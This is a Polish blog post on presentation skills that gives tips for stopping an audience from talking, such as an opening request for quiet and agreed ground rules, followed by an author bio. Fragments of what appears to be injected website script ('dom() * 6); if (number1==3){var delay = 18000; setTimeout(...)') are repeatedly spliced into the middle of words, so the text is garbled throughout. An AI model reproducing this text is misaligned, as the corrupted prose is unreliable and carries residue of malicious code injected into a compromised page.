Jak uciszyć rozgadane audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium 1

Zawsze będę namawiał Cię do aktywnej prezentacji dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to znaczy takiej, w której uczestniczy publiczność. Ludzie powinni odpowiadać na Twoje pytania, wygłaszać opinie, wykonywać ćwiczenia lub polecenia. Nie możesz dopuścić do sytuacji, w której ludzie zaczną się  nudzić i poszukiwać innych atrakcji np. partnera do rozmowy.

Pamiętaj, tylko utrzymanie uwagi publiczności zapewni Ci osiągnięcie celu Twojej prezentacji. Jak radzić sobie  gdy uczestnicy Twojej prezentacji rozmawiają? Najlepiej nie dopuszczać do takich sytuacji. Mój sposób na działanie prewencyjne jest następujący:

Na samym wstępie prezentacji mówię do uczestników:

– Wiem, że takie spotkania jak dzisiejsze są dla części z Państwa okazją do spotkania dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towarzyskiego z dawno nie widzianymi znajomymi. Sam w takich sytuacjach mam ochotę opowiedzieć znajomym co się u mnie dzieje. Ciekaw jestem co u nich  słychać.  Bardzo jednak proszę Państwa o powstrzymanie się od rozmów przez najbliższe dwie godziny, bo tyle potrwa nasze szkolenie.

Skłamałbym gdybym powiedział, że ta medom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toda zawsze działa ale zapewniam Cię, że spora część kursantów dosdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosuje się do Twojej prośby.

Podobną medom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todą, bardziej “oficjalną” na zapewnienie sobie ciszy podczas prezentacji dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to kontrakt.

Rozpoczynając wystąpienie ustalam zasady jakie będą obowiązywać przez ten czas. Możesz ustalić w tym momencie przerwy, powiedzieć ludziom kiedy będzie czas na zadawanie pytań i oczywiście poprosić o wyłączenie telefonów komórkowych oraz o powstrzymanie się od rozmów na czas Twojego przemówienia.

Co zrobić gdy mimo Twoich próśb, ludzie rozmwiają jak najęci (chyba przez konkurencję)… piszę w artykule pt. Jak uciszyć rozgadane audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium 2

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply